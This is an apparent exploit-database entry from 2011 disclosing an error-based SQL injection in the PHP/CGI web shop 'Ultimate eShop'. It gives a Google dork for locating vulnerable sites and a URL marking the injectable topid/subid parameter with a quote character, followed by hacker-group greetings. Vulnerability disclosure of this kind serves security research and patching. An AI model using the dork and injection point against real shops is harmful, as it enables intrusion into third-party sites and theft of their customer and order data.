[] NeoSense

Ultimate eShop - Error-Based SQL Injection

Author: Romka
type: webapps
platform: php
port: 
date_added: 2011-04-20 
date_updated: 2016-09-21 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Ultimate eShop Error Based SQL Injection Vulnerability
# Google Dork: inurl:index.cgi?aktion=shopview
# Date: 19/04/2011
# Author: Romka
# Software Link: http://www.ultimate-eshop.de/
# Tested on: Windows XP SP3

# Exploit:

http://localhost/index.cgi?aktion=shopview&go=artikel&topid=1&subid=1'ERROR BASED INJECTION

# Greetings:

CliC, pyro, r0bnet, Haukez, Dexter and Cyberpunkz